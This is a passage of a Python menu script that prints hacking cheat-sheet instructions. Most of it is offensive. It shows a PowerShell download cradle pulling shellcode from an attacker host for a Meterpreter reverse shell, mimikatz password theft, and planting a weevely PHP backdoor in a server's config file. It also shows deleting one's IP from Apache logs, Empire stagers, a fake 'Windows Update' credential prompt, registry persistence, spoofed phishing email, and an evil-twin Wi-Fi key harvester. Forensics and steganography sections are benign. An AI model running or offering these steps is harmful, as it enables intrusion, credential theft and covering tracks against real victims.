			print('^ These Commands Will Set Up And Run A Listener, Now We Just Wait For A Connection ^ \n')
			print(colored("> IEX(New-Object Net.WebClient).DownloadString ('http://<IP Address>:<Port Number>/CodeExecution/Invoke-Shellcode.ps1", 'green'))
			print('^ Type The Following Into The Powersploit Window ^ \n')
			print(colored("> Invoke-Shellcode -Payload windows/meterpreter/reverse_http -lhost <IP Address> -lport <Port Number> -Force", 'green'))
			print('^ If Everything Runs Smoothly, This Script Will Start A Meterpreter Session on Windows Machine Within The Context Of The Powershell Process ^ \n')
			print('In msfconsole, Type "sessions -l" To View All Sessions \n')
			print('If Successful, The Meterpreter Shell Will Be Running In The Context Of The Powershell Process And Will Now Be Picked Up By AV Software')
			print('Also, The Meterpreter Is Running Entirely On Memory, Meaning That There Will Be No Evidence Found On The Hard Drive \n')

		elif App8 == "2":
			print('When You Have A Payload On Target Machine, And Have Meterpreter + System Privileges. Only Than You Can Use Mimikatz')
			print('Open msfconsole And Enter The Session')
			print(colored("load mimikatz", 'green'))
			print('^ loads mimikatz onto target ^ \n')
			print(colored("help mimikatz", 'green'))
			print('^ This Displays A List Of Commands You Can Use ^ \n')
			print(colored("msv", 'green'))
			print('^ This Uses A Built-In Command To Retrieve Passwords From Memory ^ \n')
			print(colored("kerberos", 'green'))
			print('^ Under "Packages" We Can See That The Target There Are NTLM Hashes, To View The Credentials Type Command Above ^ \n')
			print('This Is How You Steal Users Credentials')

		elif App8 == "3":
			print(colored("weevely generate <Input A Desired Password> backdoorname.php", 'green'))
			print('^ Generates A PHP Backdoor ^ \n')
			print(colored("enter 'config.php' or 'setting.php' file that can be found on a server, copy your payload contents and paste into one of these '.php' docs", 'green'))
			print('^ This Is How You Slip In Your Backdoor To A Server ^ \n')
			print(colored("weevely http://localhost/info.php <Password You Set>", 'green'))
			print('^ See If The Connection Responds Back ^ \n')
			print(colored(":help", 'green'))
			print('^ If Connection Is Made Run Above Command To See What Is You Can Do From There, After Typing ":help", Look Into How You Can Raise Permissions Within Weevely ^ \n')
			print('\n')
			print(colored("cd /usr/share/weevely", 'green'))
			print('^ Go To This Directory ^ \n')
			print(colored("weevely http://localhost/info.php <Password You Set>", 'green'))
			print(colored("audit_etcpasswd", 'green'))
			print('^ Bypass Policy To Read "/etc/passwd" ^ \n')
			print(colored("bruteforce_sql --help", 'green'))
			print('^ This Will Show You How To Set Up A Bruteforcer In Weevely ^ \n')
			print(colored("cd /var/log", 'green'))
			print('^ This Is The Path To Your Logs, Im Going To Teach You How To Clear The Server In The Tracking Records ^ \n')
			print(colored("system_info -info client_ip", 'green'))
			print('^ This Is So We Can Find Our Own IP ^ \n')
			print(colored("cd apache2", 'green'))
			print(colored("cat '/var/log/apache2/access.log.1' |grep '<IP Address>'", 'green'))
			print('^ We Use Grep To Conform Our IP Records In The Log File ^ \n')
			print(colored("cat '/var/log/apache2/access.log.1' |grep -v'<IP Address' > cleaned.log", 'green'))
			print('^ If There Are Records We Can Remove Our Log From The IP And Save It To A Temporary File ^ \n')
			print(colored("cat cleaned.log |grep '<IP Address>'", 'green'))
			print(colored("rm access.log.1", 'green'))
			print(colored("mv cleaned.log access.log.1", 'green'))
			print('^  These Steps Test To See If The Cleaned.log Worked Correctly, Than Deletes Access.log, And Than Renames Cleaned.log to Access.Log. ^ \n')
			print('^ Now There Is No Trace Of You ^ \n')

		elif App8 == "4":
			print(colored("powershell-empire", 'green'))
			print('^ This Will Load The Powershell-Empire Program ^ \n')
			print(colored("listeners", 'green'))
			print('^ This Will List Active Listeners ^ \n')
			print(colored("uselistener <TAB>", 'green'))
			print('^ If You Dont Have A Listener Started. Use This Command. This  Will List Available Listeners On This Program ^ \n')
			print('		-dbx: A Dropbox Listener( Never Reveals TheAttackers Network To Victim, But Requires A Token "DropBox API"')
			print('		-http: A Standard HTTP/HTTPS Listener')
			print('		-http_com: HTTPS/HTTPS Listener That Uses A Hidden El COM Object')
			print('		-http_foreign: HTTP/HTTPS Listener Used To Inject Empire Payloads')
			print('		-http_hop: HTTP/HTTPS Listener That Redirects Commands To Another Listener To Conceal The Initial IP Address (RedirectListener Parameter Is Required')
			print('		-http_mapi: HTTP/HTTPS Listener That Uses The "Liniaal" Utility Allowing You To Gain ControlOver The Target Through AN Exchange Server')
			print('		-meterpreter: HTTP/HTTPS Listener Used To Inject Meterpreter Payloads')
			print('		-onedrive: A OneDrive Listener (You Have To Register "https://apps.dev.microsoft.com")')
			print('		-redirector: A Tool That Redirects You From One Agent To Another')
			print('\n')
			print(colored("uselistener http", 'green'))
			print('^ This Selects What Type Of Listener To USe ^ \n')
			print(colored("info", 'green'))
			print('^ This Command Lets You See The Help Menu From Listener ^ \n')
			print(colored("set Name <Listener Name>", 'green'))
			print(colored("set Host <http://<IP Address>", 'green'))
			print(colored("set Port <Port Number>", 'green'))
			print(colored("execute", 'green'))
			print('^ These Group Of Commands Sets Up And Starts A Listener ^ \n')
			print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n", 'magenta'))
			print(colored("usestager", 'green'))
			print('^ Stagers Can Be Either Multiplatform Or OS Specific (Targeting Only MacOS Or Windows) ^ \n')

			print('		-bash: An Ordinary Bash Script')
			print('		-launcher: A One-Liner Written In A Certain Scripting Language')
			print('		-macro: A Macro For Office Applications')
			print('		-pyinstaller: An ELF File Built Using PyInstaller')
			print('		-war: A Set Of Bytes Used To Upgrade A Stager')
			print('		-applescript: An AppleScript File')
			print('		-application: An Application File')
			print('		-ducky: A Rubber Ducky Script')
			print('		-dylib: A Dynamic Library Is MacOS')
			print('		-jar: A Payload In TheJAR Format')
			print('		-machomacOS: An Office Macro For MacOS')
			print('		-pkg: A PKG installer That Must Be Copied To The /Applications Directory')
			print('		-safari_launcher: An HTML Script For Safari')
			print('		-shellcode: A Windows Shell')
			print('		-teensy: A Teensy Script')
			print('		-backdoorLnkMacro: A .lnk File Used To Upload And Launch An Application')
			print('		-bunny: A Bash Bunny Script')
			print('		-csharp_exe: A Powershell/C# Application')
			print('		-dll: A Stager In The DLL Format')
			print('		-hta: An HTA Stager For IE')
			print('		-macroless_msword: A Macroless Document')
			print('		-wmic: An XSL Stager For "wmic.exe" (Not Present In Original Empire) \n')
			print(colored("usestager <windows/launcher_bat>", 'green'))
			print('^ This Selects A Stager. Input Any Type Of Stager You Would Like To Use ^ \n')
			print(colored("info", 'green'))
			print('^ This Lists Available Options ^ \n')
			print(colored("set Listener <Name Of Previously Made Listener>", 'green'))
			print('^ This Starts The Listener You Just Made In The Past Section ^ \n')
			print(colored("set OutFile </path/to/resultant/bat/file.bat>", 'green'))
			print(colored("execute", 'green'))
			print('^ Empire Allows You To Set Up A Proxy Server And Has A Built-In Obfuscation Function (Only Works With Powershell SCripts) ^ ')
			print('^ You Can Select Where To Save The Resultant .bat File And Instruct The Program To Delete It After Execution.^ ')
			print('^ When Pressed Enter The .bat File Is Created And Saved In The Secified Location ^ \n')
			print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n", 'magenta'))
			print(' Now You Have To Execute The .bat File On The Target Host. Once They Click On It, You Will See A Connection Notification \n')
			print(colored("agents", 'green'))
			print('^ This Will List All Agents ^ \n')
			print(colored("rename <Name Of Target Computer> al1", 'green'))
			print(colored("interact al1", 'green'))
			print('^ For Convenience, You Should Rename Your Agent And Switch The Agent Control Interface ^ \n')
			print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n", 'magenta'))
			print('Post Exploitation With Empire \n')
			print(colored("<Choose An Option>", 'green'))
			print('^ You Will Need To Choose An Option Once Target Connects To You ^ \n')
			print('		-sysinfo: Provides System Information')
			print('		-download/upload: Uploads Files To A Remote Host And Downloads Files From It')
			print('		-sleep: Sets An Interval(seconds) For Communication With The Agent. When You Type A Command, The Command Is Put In Queue Until Interval Runs Out')
			print('		-steal_token: Impersonates AN Access Token')
			print('		-shell [cmd]: Allows To Execute A Command Using "cmd.exe"')
			print('		-ps: Displays A List Of Processes, Including Process Name, PID, User, In Whose Context The Process Is Running, And Memory Used In Process')
			print('		-psinject: Injects An Agent Into ANother Process')
			print('		-scriptimport: Allows To Load A Powershell Script To The Memory')
			print('		-mimikatz: quickly and easily executes mimikatz functions')
			print('			^sekurlsa::logonpasswords: Steals Login Passwords')
			print('		-creds: A Local Storage Of Login Creds. Hashes Are Added Automatically When Using Various Modules, But You Can Also Add/Remove Them Manually')
			print(colored("searchmodule", 'green'))
			print('^ This Lists Additional Modules That Havent Been Listed ^ \n')
			print(colored("searchmodule <module name>", 'green'))
			print('^ This Gives A Detailed Description Of Provided Module ^ \n')
			print('List Of Collection Modules')
			print('		-collection/ChromeDump')
			print('		-collection/FoxDump')
			print('		-collection/SharpChromium ')
			print('		-collection/file_finder')
			print('		-collection/minidump')
			print('		-collection/keylogger')
			print('		-collection/clipboard_monitor')
			print('		-collection/prompt')
			print('		-collection/toasted')
			print(colored("usemodule collection/SharpChromium", 'green'))
			print(colored("run", 'green'))
			print(colored("y", 'green'))
			print('^ This Launches The Module Of Your Choice ^ \n')
			print(colored("set ToastTitle <'Your Session Will Be Terminated'>", 'green'))
			print(colored("set ToastMessage <'The System Will Restart In 5 Minutes. Do You Want To Postpone The Restart?'>", 'green'))
			print(colored("set Application 'Windows Update'", 'green'))
			print(colored("set CredBoxTitle <'Are You Sure You Want To Restart Your PC?'>", 'green'))
			print(colored("set CredBoxMessage <'You Must Authenticate To Perform This Action'>", 'green'))
			print(colored("run", 'green'))
			print('^ These Messages Will Appear On The Victims Computer Screen. User Will Enter User And Pass Not Knowing Theyre Handing Off Their Authentication Info. ^ \n')
			print(colored("usemodule credentials/mimikatz/dcsync_hashdump", 'green'))
			print(colored("usemodule management/enable_rdp", 'green'))
			print(colored("usemodule management/vnc", 'green'))
			print(colored("usemodule privesc/getsystem", 'green'))
			print(colored("usemodule privesc/sherlock", 'green'))
			print(colored("usemodule privesc/powerup/allchecks", 'green'))
			print(colored("usemodule situational_awareness/host/antivirusproduct", 'green'))
			print(colored("usemodule situational_awareness/host/applockerstatus", 'green'))
			print(colored("usemodule situational_awareness/host/computerdetails", 'green'))
			print(colored("usemodule situational_awareness/network/get_spn", 'green'))
			print(colored("usemodule situational_awareness/network/powerview/get_domain_trust", 'green'))
			print(colored("usemodule situational_awareness/network/powerview/map_domain_trust", 'green'))
			print(colored("usemodule situational_awareness/network/bloodhound3", 'green'))
			print(colored("set CollectionMethod All^^^^", 'green'))
			print(colored("download *BloodHound*", 'green'))
			print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n", 'magenta'))
			print('Persistance Modules \n')
			print(colored("usemodule pusemodule persistence/elevated/registry", 'green'))
			print(colored("set Listener l1", 'green'))
			print(colored("run", 'green'))
			print('^ If Target Turns Off And On Computer, This Make Sure Your Computer Will Stay Connected Because Its Stored A Backdoor In The Registry Files. ^ \n')
			print('\n')
			print(' *	Thats The Tutorial On Powershell-Empire *')


		else:
			return

#//////////////////////////////////DONE//////////////////////DONE////////////////////////////////////////////////////////////////////////////////////////////////
################################		FORENSICS		#########################################################################
	elif number == "10":
		print('\n			SHOULD BE NOTED THAT YOU WILL NEED A TO GET AN "IMAGE"  OR A CLONE OF COMPUTER YOU ARE COLLECTING FROM')
		print('				ONE GREAT WAY TO GET A CLONE OF A DEVICE IS USING "CLONEZILLA"')
		print('			HERE IS THE DOWNLOAD LINK FOR A LIVE USB CLONEZILLA    ---->>>>		     https://clonezilla.org/downloads.php \n')
		print(colored("1. autopsy", 'blue'))
		print(colored("2. binwalk", 'cyan'))
		print(colored("3. bulkextractor", 'blue'))
		print(colored("4. hashdeep", 'cyan'))

		App9 = input("What Application Do You Want To Use: ")
		print(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'red'))
		print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'red'))
		print('\n')

		if App9 == "1":
			print(colored("Desktop Screen --> Applications (top left corner) --> Forensics --> autopsy", 'yellow'))
			print('^  Go Through These Steps To Start Up Autopsy ^ \n')
			print(colored("Right Click On Link --> Open Link", 'yellow'))
			print('^  This Will Bring You To Autopsys Server ^ \n')
			print(colored("Create A New Case", 'yellow'))
			print('^ Provide A Case Name Of Your Wish, List Some Details, And Investigator Names(alias) Than Click On Next^ \n')
			print(colored("Add A Host", 'yellow'))
			print('^  Provide A Host Name(Name Of Computer), Description, And Time Zone ^ \n')
			print(' Now To Add An Image File ')
			print(colored('a. Linux', 'red'))
			print(colored('b. Windows/MacOS/Mobile Device', 'blue'))
			OS = input("Where Do You Want To Get The Image From: ")
			if OS == "a":
				print(colored("dcfldd if=/dev/sda of=/media/name bs=512", 'green'))
				print('^ Run The Command Above In Terminal ')
				pass
			elif OS == "b":
				print(' Download Belkasoft @ https://belkasoft.com | Go Through Steps And Acquire The Image')
				pass
			else:
				pass
			print(colored("1. /path/to/image, 2. Type=Disk, 3. Import Method=Copy", 'yellow'))
			print('^ Fill Out The Needed Information As Listed Above And Click On Next ^ \n')
			print(colored("Now 'Calculate' The Hash If You Didnt Do It When Capturing Image" 'yellow'))
			print(colored("If You Did Calculate The Hash When Capturing Image Select 'Add'", 'yellow'))
			print('You Should Be All Done')

		elif App9 == "2":
			print(colored("binwalk -h", 'green'))
			print('^ This Prints Out The Help Menu ^ \n')
			print(colored("binwalk <firmware-image>", 'green'))
			print('^ An Example Of a frimware-image --> xdvi.bin ^ \n')
			print(colored("binwalk -e <firmware-mage>", 'green'))
			print('^ Extract Files From Firmware ^ \n')
			print(colored("binwalk -Me <firmware-image>", 'green'))
			print('^ Extract Files From Firmware Recursively ^ \n')
			print(colored("binwalk -W <firmware1-image> <firmware2-image> <firmware3-image>", 'green'))
			print('^ Generate Differences Between Firmware Images ^ \n')
			print(colored("binwalk -B <firmware-image>", 'green'))
			print('^ Signature Analysis ^ \n')
			print(colored("binwalk -E <firmware-image>", 'green'))
			print('^ Entropy Analysis ^ \n')
			print(colored("sudo binwalk -u", 'green'))
			print('^ Upgrade To The Latest Version ^ \n')
			print(colored("binwalk --verbose <firmware-image>", 'green'))
			print('^ Verbose Output ^ \n')
			print(colored("binwalk -f file.lg <firmware-image>", 'green'))
			print('^ Capture Log Files ^ \n')
			print(colored("binwalk -t <firmware-image>", 'green'))
			print('^ Format Output To A Current Terminal ^ \n')
			print(colored("binwalk -y 'filesystem' <firmware-image>", 'green'))
			print('^ To Display FileSystem Of Binary ^ \n')
			print(colored("binwalk --disasm <firmware-image>", 'green'))
			print('^ To Display CPU Architecture Of Binary ^ \n')
			print(colored("binwalk -y 'endian' <firmware-image>", 'green'))
			print('^ To Display Endianness Of Binary ^ \n')
			print(colored("binwalk -reM <firmware-image>", 'green'))
			print('^ To Extract The Firmware Recursively And Decompress The File ^ \n')
		elif App9 == "3":
			print(colored("bulk_extractor -h", 'green'))
			print('^ This Displays The Help Menu ^ \n')
			print('You Will Need To Acquire A Disk Image Downloaded, If You Already Have One Continue...')
			print(colored("bulk_extractor -o <New Directory Name> <Name Of Disk Image>.000", 'green'))
			print('^ This Outputs The Drive Into A Directory So Contents Can Be Accessable ^ ')
			print('^ This Will More Than Likely Take Some Time ^ \n')
			print(colored("fdisk -l", 'green'))
			print('^  This Will Scan Our Pen Drive Without Making A Disk Image, First, Plug The Drive Into Our System And Check The Partition, By Running Command Above ^ \n')
			print(colored("bulk_extractor -o <Pendrive Name> /dev/sdb -E wordlist", 'green'))
			print('^ If You Scan With A Specific Scanner It Takes Less Time. So Well Use The Wordlist Scanner In The Example.  ^')
			print('^ The Command Above Will Generate A Wordlist From Out Pendrives Documents ^ \n')

		elif App9 == "4":
			print(colored("Go To Applications --> Forensics --> hashdeep", 'green'))
			print('^ This Will Display A How To Use Chart ^ \n')
			print(colored("hashdeep /Provide/Path/To/File/FileName.txt", 'green'))
			print('^ This Will Create A Hash Of A File ^ ')
			print('^ If User Makes Changes To That File, The Hash Changes Accordingly ^ \n')
			print(colored("hashdeep -r <Name Of Directory>", 'green'))
			print('^ This Will Give A Directory A Hash Value ^ \n')
			print(colored("hashdeep -x -w -k <known-hashes>.txt *", 'green'))
			print('^ This Will Display Any Positive Matches Of Hashes ^ \n')
			print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n", 'magenta'))
			print('-------------------------If You Need To Have The Contents Of A File To Be Hashed And Saved To A New File, This Is How You Do It--------------------------')
			print(colored("md5sum <FileContentsToHash>.txt > <FileContentsToHash_Hash>.md5", 'green'))

		else:
			return



##################################		SOCIAL  ENGINEERING		#####################################################################3
	elif number == "11":
		print(colored(" Social Engineering Toolkit", 'blue'))
		print('\n')
		print(colored("setoolkit", 'green'))
		print('^ This Will Open The SET Program And It Will Give You A List Of Options To Choose From ^ \n')
		print(colored("1", 'green'))
		print('^  This Will Give You A Whole List Of Socail Engineering Attacks ^ \n')
		print(colored("5", 'green'))
		print('^ In That Section We Will Choose A Mass Mailer Attack ^ \n')
		print(colored("1", 'green'))
		print('^ In This Example, We Will Just Use A Email Attack With A Single Email Address ^ \n')
		print(colored("<Enter In Target E-mail Address>", 'green'))
		print(colored("1", 'green'))
		print('^ You Will Have Two Options To Choose From, We Chose 1 ^ \n')
		print(colored("<Enter Your Gmail Address> (Dont Worry Your Email Wont Be Revieled, It'll Be Cleared Up Next)", 'green'))
		print('^ Use Your Valid Email. We Are Going To Be Spoofing Next! ^ \n')
		print(colored("<Enter Email Address You Want The Target To See>", 'green'))
		print('^ This Will Spoof Your E-mail So The Target Wont Have Your Real Email. ^ \n')
		print(colored("yes", 'green'))
		print(colored("<y/n>", 'green'))
		print(colored("<Write What You Would Like The Email Subject To Be>", 'green'))
		print(colored("p", 'green'))
		print(colored("<Enter Your Message>", 'green'))
		print('^ Its Advised To Either Provide A Link Or Send An Attachment Thats Malicious In Order To Actually Make This An Attack ^ ')
		print('^ As Soon As You Are Done Typing The Message, Press "Enter" And Type "END" And Press "Enter" Again To Send The Message ^ \n')
		print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n", 'magenta'))
		###################################################
		#	There Is Another Section To Cover.. https://www.kalilinux.in/2019/07/set-social-engineering-toolkit.html





###################################		MISC			###############################################################################
	elif number == "12":
		print(colored("1. Get A Computers Public IP Address Or Get A Websites Public IP Address"  , 'blue'))
		print(colored("2. How To Create An Evil-Twin", 'cyan'))
		print(colored("3. stegsnow", 'blue'))

		App10 = input("What Application Do You Want To Use: ")
		print(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'red'))
		print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'red'))
		print('\n')


		if App10 == "1":
			print(colored("echo $(wget -qO - https://api.ipify.org)", 'green'))
			print('^ Gets Public IP Address From Current Computer ^ \n')
			print(colored('OR\n', 'red'))
			print(colored("nano IP.py", 'green'))
			print('^ This Creates A Python File, We Will Set It Up So All You Need To Do When You Run The Program Is Type Out The Websites URL. ^\n')

			print(colored('				COPY AND PASTE THE FOLLOWING CONTENTS ', 'yellow'))
			print(colored(" ''", 'yellow'))
			print(colored("import socket", 'green'))
			print(colored(" ", 'green'))
			print(colored("x = input('What Is The Websites URL: ')", 'green'))
			print(colored("IP_address = socket.gethostbyname(x)", 'green'))
			print(colored("print(IP_address)", 'green'))
			print(colored("''", 'yellow'))

			print('^ Press <CTRL + o> And Press <ENTER>  To Save The File^')
			print('^Press <CTRL + x> To Exit ^\n')
			print(colored("chmod +x IP.py", 'green'))
			print('^ This Grants Permissions To Allow The File To Run ^\n')
			print(colored("python3 IP.py", 'green'))
			print('^ This Runs The Program ^ \n')

		elif App10 == "2":
			print(colored("apt-get install dhcp3-server", 'green'))
			print('^ This Downloads The DHCP Server ^ \n')
			print(colored("nano /etc/dhcpd.conf", 'green'))
			print(' authoritative;')
			print(' default-lease-time 600;')
			print(' max-lease-time 7200;')
			print(' subnet 192.168.1.129 netmask 255.255.255.128 {')
			print(' option subnet-mask 255.255.255.128;')
			print(' option broadcast-address 192.168.1.255;')
			print(' option routers 192.168.1.129;')
			print(' option domain-name-servers 8.8.8.8;')
			print(' range 192.168.1.130 192.168.1.140;')
			print('}')
			print(' ^ Type The Following Into The File * \n')
			print(colored("cd /etc/www/", 'green'))
			print('^ Got To This Directory ^ \n')
			print(colored("rm index.html", 'green'))
			print(colored("wget http://hackthistv.com/eviltwin.zip", 'green'))
			print(colored("unzip eviltwin.zip", 'green'))
			print(colored("rm eviltwin.zip", 'green'))
			print(' ^ Run The Commands Above ^ \n')
			print(colored("/etc/ini.d/apache2 start", 'green'))
			print(colored("/etc/ini.d?mysql start", 'green'))
			print('^ Run The These Commands ^ \n')
			print(colored("mysql -u root", 'green'))
			print(colored("create database evil_twin;", 'green'))
			print(colored("use evil_twin", 'green'))
			print(colored("create table wpa_keys(password varchar(64), confirm varchar(64));", 'green'))
			print('^ Type In These Commands * \n')
			print(colored("ip route", 'green'))
			print(colored("airmon-ng", 'green'))
			print(colored("airmon-ng start wlan0", 'green'))
			print(colored("clear", 'green'))
			print('^ Run These Commands ^')
			print(colored("airodump-ng-oui-update", 'green'))
			print(colored("airodump-ng -M mon0", 'green'))
			print(colored("airbase-ng -r <ESSID> -c <Channel Number> -P mon0", 'green'))
			########################################################################
			print(colored(" Continue Later Link: 'https://www.hacking-tutorial.com/hacking-tutorial/how-to-create-evil-twin-access-point/#sthash.4kIuC7yn.dpbs'", 'yellow'))

		elif App10 == "3":
			print(colored("stegsnow -h", 'green'))
			print('^ This Prints Out The Help Menu ^ \n')
			print('		YOU NEED A .TXT FILE FOR THIS, DOESNT MATTER WHICH ONE \n')
			print(colored("stegsnow -C -m '<Put Your Message Here>' -p '<Put Password Here>' <txt_file_name>.txt <new_file_name>.txt", 'green'))
			print('^ -C Compresses The Data, -m Defines The Message You Want To Encrypt, -p Is The Password ^')
			print('^ Now The 2 File Names. The First One Is A TXT File You Already Have, The Second One Will Be The New TXT File With Encrypted Message ^ \n')
			print(colored("stegsnow -C -p '<Put Password Here>' <new_file_name>.txt", 'green'))
			print('^ This Is How You Decrypt Hidden Message From The TXT File. ^ \n')

		else:
			return

Catagory()